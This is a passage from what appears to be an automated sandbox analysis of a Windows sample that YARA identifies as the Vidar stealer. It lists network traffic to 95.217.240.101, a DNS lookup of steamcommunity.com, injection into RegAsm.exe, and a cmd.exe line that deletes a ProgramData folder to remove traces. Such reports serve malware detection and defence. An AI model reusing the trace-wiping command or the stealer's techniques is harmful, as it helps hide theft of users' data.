                    May 17, 2024 18:05:59.803332090 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:05:59.803555965 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:05:59.804317951 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:05:59.804347038 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:05:59.805931091 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:05:59.805943012 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:06:01.131469965 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:06:01.131491899 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:06:01.131537914 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:06:01.131748915 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:06:01.131985903 CEST49707443192.168.2.595.217.240.101
                    May 17, 2024 18:06:01.132009029 CEST4434970795.217.240.101192.168.2.5
                    May 17, 2024 18:06:01.133892059 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:01.133915901 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:01.134006023 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:01.134257078 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:01.134263992 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:02.658077002 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:02.658169031 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:02.658602953 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:02.658608913 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:02.660201073 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:02.660206079 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024296999 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024359941 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024411917 CEST49708443192.168.2.595.217.240.101
                    May 17, 2024 18:06:04.024425030 CEST4434970895.217.240.101192.168.2.5
                    May 17, 2024 18:06:04.024454117 CEST49708443192.168.2.595.217.240.101

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 17, 2024 18:05:50.215388060 CEST6543953192.168.2.51.1.1.1
                    May 17, 2024 18:05:50.261188984 CEST53654391.1.1.1192.168.2.5

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    May 17, 2024 18:05:50.215388060 CEST192.168.2.51.1.1.10xb9ddStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    May 17, 2024 18:05:50.261188984 CEST1.1.1.1192.168.2.50xb9ddNo error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • steamcommunity.com
                    • 95.217.240.101

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:12:05:49
                    Start date:17/05/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xab0000
                    File size:372'224 bytes
                    MD5 hash:75DB6DFDEBB9BF0D98ACFC15F2219C62
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:1
                    Start time:12:05:49
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:12:05:49
                    Start date:17/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x8c0000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:12:06:58
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                    Imagebase:0x790000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:12:06:58
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:9
                    Start time:12:06:58
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\timeout.exe
                    Wow64 process (32bit):true
                    Commandline:timeout /t 10
                    Imagebase:0x1f0000
                    File size:25'088 bytes
                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    No disassembly